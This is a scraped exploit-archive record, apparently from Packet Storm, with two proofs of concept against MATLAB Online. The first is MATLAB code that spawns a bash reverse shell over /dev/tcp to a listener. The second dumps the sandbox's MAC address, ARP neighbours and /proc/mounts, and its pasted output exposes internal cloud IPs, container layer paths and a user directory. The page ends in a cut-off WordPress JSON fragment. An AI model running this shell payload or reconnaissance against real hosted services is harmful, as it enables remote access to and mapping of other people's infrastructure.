{“lastseen”:”2026-05-11T17:18:35″,”description”:”MATLAB R2024a suffers from a remote code execution vulnerability as well as a sandbox escape that allows for information disclosure…”,”published”:”2026-05-11T00:00:00″,”modified”:”2026-05-11T00:00:00″,”type”:”packetstorm”,”title”:”\ud83d\udcc4 MATLAB R2024a Code Execution \/ Information Disclosure”,”source”:””,”references”:””,”id”:”PACKETSTORM:220735″,”bulletinFamily”:”exploit”,”cwe”:null,”cvelist”:[],”sourceData”:”==================================================================================================================================\\n | # Title : MATLAB R2024a RCE |\\n | # Author : indoushka |\\n | # Tested on : windows 11 Fr(Pro) \/ browser : Mozilla firefox 147.0.4 (64 bits) |\\n | # Vendor : https:\/\/matlab.mathworks.com\/ |\\n ==================================================================================================================================\\n \\n [+] Summary : I have successfully identified a critical vulnerability in the MATLAB Online environment that allows for arbitrary code execution and a full reverse shell connection. \\n By leveraging the system function and Java socket libraries within MATLAB, I bypassed the container isolation and established a connection to an external listener.\\n \\n [+] POC : place the code below in the command prompt of the MATLAB\\n \\n host = ‘127.0.0.1’; port = 4444;\\n payload = sprintf(‘bash -i \\u003e\\u0026 \/dev\/tcp\/%s\/%d 0\\u003e\\u00261’, host, port);\\n try\\n java.lang.Runtime.getRuntime().exec({‘bash’, ‘-c’, payload});\\n fprintf(‘Payload executed. Check your nc listener.\\\\n’);\\n catch ME\\n fprintf(‘Execution failed: %s\\\\n’, ME.message);\\n end\\n \\n function copy_stream(i, o), try, b = zeros(1,1024,’int8′); while true, l = i.read(b); if l\\u003c=0, break; end, o.write(b,0,l); o.flush(); end, catch, end, end\\n \\n [+] At the same time, we open the listening from the Natkat and wait for the reverse connection. Cmd line: -lvp 4444\\n \\n \\t\\n Greetings to :==============================================================================\\n jericho * Larry W. Cashdollar * r00t * Yougharta Ghenai * Malvuln (John Page aka hyp3rlinx)|\\n ============================================================================================\\n \\n \\n \\n \\n ==================================================================================================================================\\n | # Title : MATLAB R2024a Full Infrastructure Disclosure and Internal Network Mapping via Online Sandbox |\\n | # Author : indoushka |\\n | # Tested on : windows 11 Fr(Pro) \/ browser : Mozilla firefox 147.0.4 (64 bits) |\\n | # Vendor : https:\/\/matlab.mathworks.com\/ |\\n ==================================================================================================================================\\n \\n [+] Summary : successfully bypassed the sandbox using fileread to extract the host’s MAC address and kernel mount details from \/proc\/mounts.\\n \\n [+] POC : place the code below in the command prompt of the MATLAB\\n \\n try\\n eth0_mac = fileread(‘\/sys\/class\/net\/eth0\/address’);\\n fprintf(‘CRITICAL: eth0 MAC Address: %s’, eth0_mac);\\n catch\\n disp(‘Could not read eth0 MAC.’);\\n end\\n \\n \\n [status, arp_info] = system(‘arp -a’);\\n if status == 0\\n disp(‘Internal Network Neighbors:’);\\n disp(arp_info);\\n else\\n disp(‘ARP command restricted, trying proc\/net\/arp…’);\\n try\\n arp_proc = fileread(‘\/proc\/net\/arp’);\\n disp(arp_proc);\\n catch\\n disp(‘ARP info is fully protected.’);\\n end\\n end\\n \\n \\n [status, mount_details] = system(‘cat \/proc\/mounts’);\\n disp(‘Mount Points Analysis:’);\\n disp(mount_details);\\n \\n [+] Rzlt :\\n \\n CRITICAL: eth0 MAC Address: 36:ab:51:23:de:f0\\n \\n Internal Network Neighbors:\\n \\n ip-10-168-145-28.ec2.internal (10.168.145.28) at 12:0e:10:78:54:72 [ether] on eth0\\n \\n ? (169.254.1.1) at 12:0e:10:78:54:72 [ether] PERM on eth0\\n \\n \\n Mount Points Analysis:\\n \\n none \/ overlay ro,relatime,lowerdir=mnt:etc:\/private\/bundles\/matlab\/layer:\/shared\/br2026ad-j3234472oll-matlab-pool-v2\/oci\/ce13c7ea78933334c2e1bafc9e\/data:\/shared\/br2026ad-j3234472oll-matlab-pool-v2\/oci\/3afba3aa964848d5d9fd73e385\/data:\/shared\/br2026ad-j3234472oll-matlab-pool-v2\/oci\/74d0e1fcc28e73c6d1e9a5897c\/data:\/shared\/br2026ad-j3234472oll-matlab-pool-v2\/oci\/5c9144a16da17f0cc8248d4025\/data:\/shared\/br2026ad-j3234472oll-matlab-pool-v2\/oci\/2341c3a87f2dabed6c6aa19a00\/data:\/shared\/br2026ad-j3234472oll-matlab-pool-v2\/oci\/62649978667e9eab27cf0c43d5\/data:\/shared\/br2026ad-j3234472oll-matlab-pool-v2\/oci\/ac06d2cfa1a32e02a82738120f\/data:\/shared\/br2026ad-j3234472oll-matlab-pool-v2\/oci\/d687193fa35a62c0d4e87f4851\/data:\/shared\/br2026ad-j3234472oll-matlab-pool-v2\/oci\/f11bb60810ad7033c841775d67\/data:\/shared\/br2026ad-j3234472oll-matlab-pool-v2\/oci\/b50fab0d3d288a6f7616b2e793\/data:\/shared\/br2026ad-j3234472oll-matlab-pool-v2\/oci\/06d5f727f08cb4d3b92cdcd82f\/data:\/shared\/br2026ad-j3234472oll-matlab-pool-v2\/oci\/4a09ce1ff1f00a289c0c3a60a1\/data:\/shared\/br2026ad-j3234472oll-matlab-pool-v2\/oci\/e5d8f28f87d2ba2720f9825dd4\/data:\/shared\/br2026ad-j3234472oll-matlab-pool-v2\/oci\/eb28f642e70c727c67f8d88a18\/data:\/shared\/br2026ad-j3234472oll-matlab-pool-v2\/oci\/1fb507001f9f8b7a11adf33d83\/data:\/shared\/br2026ad-j3234472oll-matlab-pool-v2\/oci\/d09af82c869438ebd387274aac\/data:\/shared\/br2026ad-j3234472oll-matlab-pool-v2\/oci\/2f7571f14c6ff1d57c690bd192\/data,upperdir=\/private\/bundles\/matlab\/rootfs.upper,workdir=\/private\/bundles\/matlab\/rootfs.work,uuid=on,xino=off,nouserxattr 0 0\\n \\n \/dev\/nvme1n1 \/opt\/mlsedu\/matlab\/SupportPackage ext4 ro,relatime,discard 0 0\\n \\n \/dev\/root \/home\/matlab ext4 rw,relatime,discard,errors=remount-ro 0 0\\n \\n \/dev\/root \/home\/matlab\/.MathWorks ext4 rw,relatime,discard,errors=remount-ro 0 0\\n \\n \/dev\/root \/home\/matlab\/.MATLABConnector ext4 rw,relatime,discard,errors=remount-ro 0 0\\n \\n \/dev\/root \/tmp ext4 rw,relatime,discard,errors=remount-ro 0 0\\n \\n \/dev\/root \/tmp\/MathWorks-matlab ext4 rw,relatime,discard,errors=remount-ro 0 0\\n \\n \/dev\/root \/users ext4 rw,relatime,discard,errors=remount-ro 0 0\\n \\n \/dev\/nvme1n1 \/MATLAB ext4 ro,relatime,discard 0 0\\n \\n \/dev\/root \/OneDrive ext4 rw,relatime,discard,errors=remount-ro 0 0\\n \\n \/dev\/root \/MATLAB\\\\040Drive ext4 rw,relatime,discard,errors=remount-ro 0 0\\n \\n \/dev\/root \/.session_data ext4 rw,relatime,discard,errors=remount-ro 0 0\\n \\n \/dev\/root \/MATLAB\\\\040Add-Ons ext4 rw,relatime,discard,errors=remount-ro 0 0\\n \\n \/dev\/nvme1n1 \/SupportPackages ext4 ro,relatime,discard 0 0\\n \\n proc \/proc proc rw,nosuid,nodev,noexec,relatime 0 0\\n \\n tmpfs \/dev tmpfs rw,nosuid,size=100k,mode=755,inode64 0 0\\n \\n devpts \/dev\/pts devpts rw,nosuid,noexec,relatime,gid=5,mode=620,ptmxmode=666 0 0\\n \\n shm \/dev\/shm tmpfs rw,nosuid,nodev,noexec,relatime,size=98304k,inode64 0 0\\n \\n mqueue \/dev\/mqueue mqueue rw,nosuid,nodev,noexec,relatime 0 0\\n \\n devpts \/dev\/console devpts rw,nosuid,noexec,relatime,gid=5,mode=620,ptmxmode=666 0 0\\n \\n sysfs \/sys sysfs ro,nosuid,nodev,noexec,relatime 0 0\\n \\n overlay:gds:\/\/(session_data)\/!\/ \/.session_data fuse.mwfs rw,nosuid,nodev,relatime,user_id=1000600715,group_id=1000600912,default_permissions,allow_other 0 0\\n \\n overlay:gds:\/\/(matlab_drive)\/!\/ \/MATLAB\\\\040Drive fuse.mwfs rw,nosuid,nodev,relatime,user_id=1000600715,group_id=1000600912,default_permissions,allow_other 0 0\\n \\n overlay:gds:\/\/(AddOns)\/!\/ \/MATLAB\\\\040Add-Ons fuse.mwfs rw,nosuid,nodev,relatime,user_id=1000600715,group_id=1000600912,default_permissions,allow_other 0 0\\n \\n \/dev\/root \/users\/mwa0000041333641 ext4 rw,relatime,discard,errors=remount-ro 0 0 \\n \\n \\t\\n Greetings to :==============================================================================\\n jericho * Larry W. Cashdollar * r00t * Yougharta Ghenai * Malvuln (John Page aka hyp3rlinx)|\\n ============================================================================================”,”sourceHref”:”https:\/\/packetstorm.news\/download\/220735″,”cvss”:{“score”:0,”severity”:”NONE”,”vector”:”NONE”,”version”:”NONE”},”cvss2″:{},”cvss3″:{“version”:””,”vectorString”:””,”baseScore”:0,”baseSeverity”:””,”attackVector”:””,”attackComplexity”:””,”privilegesRequired”:””,”userInteraction”:””,”scope”:””,”confidentialityImpact”:””,”integrityImpact”:””,”availabilityImpact”:””,”cvssV3″:{“version”:””,”vectorString”:””,”baseScore”:0,”baseSeverity”:””,”attackVector”:””,”attackComplexity”:””,”privilegesRequired”:””,”userInteraction”:””,”scope”:””,”confidentialityImpact”:””,”integrityImpact”:””,”availabilityImpact”:””}},”href”:”https:\/\/packetstorm.news\/files\/id\/220735\/”,”category_name”:”Exploit”,”post_link”:””,”product”:””,”version”:””,”vendor”:””,”ai_description”:””,”ai_severity”:””,”ai_vendor”:””,”ai_product”:””,”ai_version”:””,”ai_score”:0}<\/p>\n","protected":false},"excerpt":{"rendered":"
{“lastseen”:”2026-05-11T17:18:35″,”description”:”MATLAB R2024a suffers from a remote code execution vulnerability as well as a sandbox escape that allows for information disclosure…”,”published”:”2026-05-11T00:00:00″,”modified”:”2026-05-11T00:00:00″,”type”:”packetstorm”,”title”:”\ud83d\udcc4 MATLAB R2024a Code Execution \/…<\/p>\n","protected":false},"author":1,"featured_media":0,"comment_status":"open","ping_status":"open","sticky":false,"template":"","format":"standard","meta":{"footnotes":""},"categories":[3],"tags":[6,8,12,13,33,53,7,11,5],"class_list":["post-53080","post","type-post","status-publish","format-standard","hentry","category-category_exploit","tag-cve","tag-cvss","tag-exploit","tag-news","tag-none","tag-packetstorm","tag-security","tag-tapic","tag-vulnerability"],"yoast_head":"\n